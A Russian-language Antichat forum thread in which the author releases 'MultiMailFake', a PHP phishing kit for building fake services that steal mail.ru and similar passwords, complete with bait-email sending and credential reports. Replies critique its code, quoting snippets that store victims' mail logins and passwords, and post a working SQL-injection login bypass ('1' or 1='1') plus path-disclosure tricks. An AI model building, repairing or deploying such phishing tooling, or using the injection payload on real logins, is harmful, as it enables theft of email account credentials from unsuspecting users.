Форум АНТИЧАТ - [MMF]

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)

- - [MMF] - MultiMailFake (https://forum.antichat.xyz/showthread.php?t=171282)

[MMF] - MultiMailFake

[MMF] 0.2

MMF - MultiMailFake.Скрипт служит,для создания Фейк сервисов,для кражи паролей от mail.ru\аналогов.

Возможности:
[+] -Регистрация пользователей\Личный кабинет(мульти режим)
[+] -Отправка Письма жертве прям из скрипта.(со втроенным примером)
[+] -Отправка отчетов пользователю на email(по желанию)
[+] -++ Изменен интерфейс.Местами переписан.

Вообщем пока, что скрипт простоват,но работает вполне отлично.
Писал для своего будущего сервиса,но потом желание пропало,да и дел по мимо него много.
А так как я за Опенсурс,то скрипты радушно выкладываю в паблик)

Код кривоват,но работает....
Просьба не писать комментарии,с текстом типа: а я бы сделал вот так ...
Так как мне ровно пофиг,как бы вы сделали.....

Скачать MMF 0.2

Нашел 15 минут свободного времени.Дописал.
Обновил первый пост.

Привыкли писать скрипты на error_reporting(0);

Код:

Notice: A session had already been started - ignoring session_start() in C:\wamp\www\1\regi.php on line 59



Notice: Undefined variable: POST in C:\wamp\www\1\regi.php on line 63



Notice: Undefined variable: POST in C:\wamp\www\1\regi.php on line 64



Notice: Undefined variable: POST in C:\wamp\www\1\regi.php on line 65

Во вторых:

PHP код:


		
			
    $login = mysql_real_escape_string($_POST['login']);

    $password = $_POST['password'];



    $query = "SELECT `id` FROM `users` WHERE `login`='{$login}' AND `password`='{$password}' LIMIT 1";

Логин обезопасил а пароль ненадо? Ну тогда лови скуль:
Любой логин и пароль:

Код:

1' or 1='1

Авторизация проходит.

Если чесно, не в обиду, скрипт УГ)))) После скули дальнейший код не смотрел, интерес пропал.

Дебагнул...

Цитата:

Сообщение от b3

Если чесно, не в обиду, скрипт УГ))))

Ну давай напиши лучще... Где от тебя хоть один норм релиз?
только вечно и умеешь что обсирать.....

1. Запросы = queries на английском. Базовые знания английского :)
2. Пути статические. Например, я кинул скрипт в папку MMF, а после cмены настроек, например, редирект идет на /logi.php. Так же и с формой фейка.
3.

PHP код:


		
			
    if (@$_GET['mod'] !== "logi" && @$_GET['mod'] !== "mail" && @$_GET['mod'] !== "test" && @

        $_GET['mod'] !== "sett" && @$_GET['mod'] !== "delete" && @$_GET['mod'] !== "exit")

in_array ф-цию не просто так придумали :)
4.

PHP код:


		
			
!preg_match("/^[\d]+$/i",

        $_GET['page'])

is_numeric - намного проще, быстрее, удобнее, легче.
5.

PHP код:


		
			
$vuvod

$primer

Никогда еще не видел кода с переменными на транслите русского языка.

Цитата:

Сообщение от mailbrush

Никогда еще не видел кода с переменными на транслите русского языка.

в большинсте пхп скриптах такое можно увидеть :)

mailbrush
я думаю нет смысла критиковать названия переменных, т.к. релиз бесплатный и выложен для того, чтобы исправить код, помочь.

имена переменный каждый задает так, как ему удобно.

есть смысл их критиковать, если скрипт выполнен на заказ, хотя ТСу ещё далеко для выполнения заказов.

Цитата:

Ну давай напиши лучще... Где от тебя хоть один норм релиз?
только вечно и умеешь что обсирать.....

Мальчик не выёбуйся, когда тебе указывают на ошибки, а учись выслушать и вынести с этого пользу. Я не стал писать что ты быдла кодер, я сказал что идея скрипта УГ, но судя по всему и ты тоже Г... раз неможеш адекватно воспринять критику, держы быдлан:

файл regi.php:

PHP код:


		
			
session_start();

Раскрытие путей через точку в сессии , исправление:

PHP код:


		
			
@session_start();

Нет проверки на занятость ника при регистрации:
http://img230.imageshack.us/img230/2401/pma.gif

Потому что быдло код:

PHP код:


		
			
$ch_login = strtolower($login);

        $pass = $pass;





        $sql = @mysql_query("SELECT * FROM `users` WHERE `login` = '".$ch_login."'");

        if(mysql_num_rows($sql) > 0)

        {

            echo'Аккуант с таким логином уже зарегистрирован!<br /><br />';

        }

Неработает, догадайся почему.

PHP код:


		
			
        elseif($email and !preg_match("#^[_\.0-9a-z-]+@([0-9a-z][0-9a-z-]+\.)+[a-z]{2,6}$#", $email))

        {

            echo'Неверный формат email!<br /><br />';

        }

Зачем ты делаеш конкатенацию строк, если используеш двойные ковычки?

PHP код:


		
			
mysql_query("INSERT INTO `$db_name`.`users` (`login` ,`password` ,`email`) VALUES ('".$_POST['login']."', '".$_POST['pass']."', '".$_POST['email']."');");

ЗЫ Ты юморист

PHP код:


		
			
$pass = $pass;

Index.php

Скуль не закрыта:

PHP код:


		
			
    $login = mysql_real_escape_string($_POST['login']);

    $password = $_POST['password'];



    $query = "SELECT `id` FROM `users` WHERE `login`='{$login}' AND `password`='{$password}' LIMIT 1";

Конструкция:

PHP код:


		
			
           $query = mysql_query("SELECT * FROM `users` ORDER BY `id` ASC");

        $vsego = mysql_num_rows($query);

        echo'<td class=border>Пользователей:'.$vsego.'</td><br>';

        

        $query = mysql_query("SELECT * FROM `querys` ORDER BY `id` ASC");

        $vsego = mysql_num_rows($query);

        echo'<td class=border>Записей:'.$vsego.'</td>';

4 запросса!!! Хотя можно было бы:

Код:

SELECT count(*) FROM users UNION SELECT count(*) FROM querys;

Регулярки ето клёво, но не до такой степени:

PHP код:


		
			
       if ( !isset($_GET['page']) or empty($_GET['page'])

          or $_GET['page'] < 0  or !preg_match("/^[\d]+$/i",$_GET['page']) )

          $show = 0;

Кстати /^[\d]+$/i модификатор i жжот в проверке на число.

Воощем в итоге я запутался в твоей писанине, непонятно зачем ты продублировал регистрацию еще и в файле logi.php

Вот еще гавнокод без проверок, делай что хочеш, просто мего сервис по тренировке хацкеров.

PHP код:


		
			
$query = "INSERT INTO querys(user, time, query, referer, ip, user_agent, maillogin, mailpass)

VALUES('".$login1."','".$time."','".$in_ip."','".$reftext."','".$ip."','".$otherinf."','".$login."','".$password."')";

mysql_query($query);

Вот ета часть кода у меня не заработала:

PHP код:


		
			
if{$row['mail_status'] = 1}{

Я заменил на

PHP код:


		
			
if($row['mail_status'] = 1){

если ты не против.

Далее:

PHP код:


		
			
$mail = strtr($mail);

Код:

Warning: strtr() expects at least 2 parameters, 1 given in C:\wamp\www\1\auth.php on line 42

И вот что-то сфейлил:

Код:

Fatal error: Call to undefined function mailenc() in C:\wamp\www\1\auth.php on line 43

Там еще файл какой-то пытался скрипт открыть, но не нашел его:

PHP код:


		
			
$maillist = file("baza.txt");

Че за файл? Ридми нету, телепаты в отпуске.

Вообщем сил больше нету, в этом "коде" можно коментировать практически каждую 2-ю строку "кода".

Цитата:

Ну давай напиши лучще... Где от тебя хоть один норм релиз?
только вечно и умеешь что обсирать.....

Во-первых мне некогда писать подобные релизы, хотя я бы писал с удовольствием, но у меня нет времени, мне приходится работать, т.к. возраст 24 года. Во-вторых ты не видел все мои релизы, поетому не тебе судить. В третих я не обсираю, я указываю на ошибки, если ты в каждом критикуюшем видеш патенциального врага ето твои проблемы/комплексы.

b3, хороший анализ. В дополнениях не нужнается, т.к. действительно, слишком кривой код.

Исправь:

Цитата:

Я заменил на

if($row['mail_status'] == 1){

и так что мы имеем.
Из всего выше описаного я нашел толлько 1 неработающую хрень с опправкой отчетов на мыло, это то что я забыл поставить =
а остальное мое желание и мелкие недоделки.

вообщем разработка всеравно заморожена.кому нужно будет - доделает.